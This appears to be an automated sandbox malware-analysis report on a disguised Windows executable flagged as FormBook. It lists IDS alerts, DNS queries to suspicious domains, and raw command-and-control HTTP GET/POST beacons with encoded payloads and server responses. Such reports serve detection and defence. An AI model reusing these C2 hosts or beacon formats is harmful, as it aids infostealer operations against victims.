Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49742 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49734 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49754 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49754 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49746 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49746 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 149.104.184.87:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49751 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49723 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49730 -> 149.104.184.87:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49730 -> 149.104.184.87:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49752 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49726 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49726 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49748 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49766 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49766 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49760 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49756 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49757 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49749 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49762 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49762 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49759 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49763 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49761 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49738 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49738 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49764 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49765 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49755 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49750 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49750 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49758 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49758 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49768 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49769 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.melengkung.xyz
Source:	DNS query: www.berkilau.xyz
Source:	DNS query: www.seasay.xyz
Source:	DNS query: www.shibfestival.xyz
Source:	DNS query: www.031234103.xyz
Source:	DNS query: www.corsix.xyz

Source: Joe Sandbox View	IP Address: 149.104.184.87 149.104.184.87
Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 104.26.13.205:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_006A22EE

Source: global traffic	HTTP traffic detected: GET /2i0k/?Oj=WeJYadYniKRZByzzvxCLkkT/xti9VVMxwhfBQxnm132QdHMxzjTmB7Uw1lV55of2Ql4+U0VOq1+fhb57LzOyaby1fpPJOzD6xaoHPItPXmKhZ7LpAlSCRctc00T1KRQVhQ==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rds845.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /wydt/?Oj=5VV5zaVyioKvui6f8qyG3IDGVPdlSdk2dL73T3ZYMn8k+e/vfjfehV3uAXE74CW6mr84kubQb7PqfuL3sByk/zBYWCv2BQUfCQ79+lHjSP4vBxnSxjyOAFkMUfbKCHJlcQ==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.schoeler.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /uzd2/?Oj=fT9N3FsFDTNmTIZF4xptKfralz4kO9B+ENo/4lsaoo6HwYKpm4Najr2/W9Iv2vCiqIxfJAhVyMrxfUWcGsu8r4MDWdtBSuEACtT++0ivluxeMSIXXXlyzaoq6x23iQHg/Q==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kpilal.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /bl60/?Oj=7KqBeI51pekf0AVUSicAI1mJWWXcRARBaI0jAhY/A6pzh5mI8UIGMoQN96TYM7FYKU4GVIyckkKWvlHhgwmaHPqmLD6kIg0NjZ1aLNIABKKmXMt1XCsrqxVg/Xx9J2iGFQ==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zkkv3oae.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /m9bw/?Oj=c65Z66AH1nUgI224hybr4IHRoXEWVrV7RgpnxZMoMLGYnYeAoGqkN18+TNo8D4wVxrXfp68kmIM9xs3h0cs0tBnseGPJeADBVKfLOWHxf0LSKeSXmt/u7CxSHooMKb6U/A==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.thrivell.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /cpbw/?Oj=j9x9kJU7UcAYEWEUt+89zuhJLorgOhrRwP39zrhC/EoZ+NnF04QyCgHeuwZnNkDy+Eh6VfeEAKF098oSI0wQSypVGkOlaLeZo5iZc1wj0hTQ9LPcGMlyO+N5HAUr/svLLg==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sscexampyq.watchesConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /0y3r/?Oj=NNsUrfDYogd5KgEmfHOhLiCUpL/ycyxUxiUVjETpADofQQCG23LbddXApMRWYwqNAPEF3q7toS5EuqqD+puOCUddsZc3FCXBgKblWzNPg5EpGYWa8CA9vWSMwSTjIgS/qw==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.melengkung.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /wbzo/?Oj=q3KlCKDmK4ELQKWWUcg/FlbQjxqr8Ug1u9jBPrpibm9/r1bZuSVNTJsKRKTfBrL1Q74mhVPLBmu2gNX7pDwWA1Ya0uEQ511O7nFW5eDTrin34QmyfBJ04VJSsE4+XEWUiw==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vvxcss.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /uztg/?Oj=+nnD4c3c3KEL/rpdey5PpuGEtusQHjNHKRoYtOqDasD0Qg1/WG/4NRhjA5miSBE9J8NC1pB0d1xeGfzelhsRyS28cJZ/vafQpLasO5iZ9LFZmh+6HbDBwHQ9RpNaYIgqLw==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.askvtwv8.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /0a6h/?Oj=4iO46mqIBVv4+k9W6LsUvCVaOUZDGEFnn7WAcz/P0eLSsJADjC1P1ze0v25FROBtMqAu0yYT6nFt/u3VwLGuhvnuc2pD6MU28aYYziUmgo2HXkOigEVhl9chVx8YdXcAgQ==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.berkilau.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /36xs/?5D6d=cV08QN8xl6&Oj=RgfpXspOgsNiHmosVF1KbpPv72dzNmiTBjL/Nd6qGeZ/g3rBomzgIOO7wigAI/htEgjf23cNUotiJq7H3Gsd2zCKLbqikPmo3Wfoi8cJScZR+KXYRyHHgSJmGOqzDsu+QA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.seasay.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /gy4u/?Oj=LcvWm9PoXmh0ed+OrIDToYlIrZw2q35DEYIU6sknWZxapDsLCzJUOh5d+BBm/MfusN5GInj1wF1Jz1YJRWWIGTglQJ790eqwMU0/8d35NlY+wgSekWmL6uFauLLvFvSxJg==&5D6d=cV08QN8xl6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.shibfestival.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /z0it/?5D6d=cV08QN8xl6&Oj=DaqYyDhfRyWIR4xS4E63/qTRIQgqoWSI9b+QdYveO98qQ64GTsQjKE9BhC2RGwgAmUZQI386DZwQTzGkc+2gSo97CrWSkF6IBCyEcAZDwL6GhoYGeU+HGkQ/PuuCEKB4YA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.031234103.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16

Source: global traffic	DNS traffic detected: DNS query: www.rds845.shop
Source: global traffic	DNS traffic detected: DNS query: www.schoeler.pro
Source: global traffic	DNS traffic detected: DNS query: www.kpilal.info
Source: global traffic	DNS traffic detected: DNS query: www.zkkv3oae.vip
Source: global traffic	DNS traffic detected: DNS query: www.thrivell.life
Source: global traffic	DNS traffic detected: DNS query: www.sscexampyq.watches
Source: global traffic	DNS traffic detected: DNS query: www.melengkung.xyz
Source: global traffic	DNS traffic detected: DNS query: www.vvxcss.info
Source: global traffic	DNS traffic detected: DNS query: www.askvtwv8.top
Source: global traffic	DNS traffic detected: DNS query: www.berkilau.xyz
Source: global traffic	DNS traffic detected: DNS query: www.seasay.xyz
Source: global traffic	DNS traffic detected: DNS query: www.shibfestival.xyz
Source: global traffic	DNS traffic detected: DNS query: www.031234103.xyz
Source: global traffic	DNS traffic detected: DNS query: www.corsix.xyz

Source: unknown

HTTP traffic detected: POST /wydt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.schoeler.proOrigin: http://www.schoeler.proCache-Control: max-age=0Connection: closeContent-Length: 203Content-Type: application/x-www-form-urlencodedReferer: http://www.schoeler.pro/wydt/User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16Data Raw: 4f 6a 3d 30 58 39 5a 77 75 6f 46 32 72 2f 43 7a 68 32 34 34 35 43 58 6b 34 7a 6d 51 63 6f 5a 58 64 70 6d 44 5a 76 74 4d 68 6c 59 5a 6b 4d 43 33 4b 76 50 61 51 54 73 6f 54 62 41 58 7a 5a 4b 6b 48 32 6e 76 34 56 4c 77 2b 4c 69 64 6f 71 53 65 4e 43 43 67 6b 65 78 32 46 70 39 62 68 6a 56 50 41 55 68 55 79 69 52 33 6a 57 59 61 50 74 49 4a 42 66 59 34 67 79 73 45 51 4d 6a 58 4f 66 64 4e 7a 59 5a 4c 6f 53 54 2b 71 43 43 5a 36 71 33 4b 37 62 7a 42 78 78 53 67 31 57 64 49 45 41 76 4b 67 57 32 50 37 4c 33 44 53 4e 5a 48 5a 74 4c 32 4a 59 55 6a 69 59 44 48 43 47 45 6a 68 31 2f 65 58 70 68 34 58 4a 56 30 46 73 3d Data Ascii: Oj=0X9ZwuoF2r/Czh2445CXk4zmQcoZXdpmDZvtMhlYZkMC3KvPaQTsoTbAXzZKkH2nv4VLw+LidoqSeNCCgkex2Fp9bhjVPAUhUyiR3jWYaPtIJBfY4gysEQMjXOfdNzYZLoST+qCCZ6q3K7bzBxxSg1WdIEAvKgW2P7L3DSNZHZtL2JYUjiYDHCGEjh1/eXph4XJV0Fs=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 12 Mar 2025 08:31:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 12 Mar 2025 08:31:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 12 Mar 2025 08:31:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 12 Mar 2025 08:31:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 12 Mar 2025 08:31:31 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 12 Mar 2025 08:31:34 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 08:32:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 Mar 2025 08:32:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 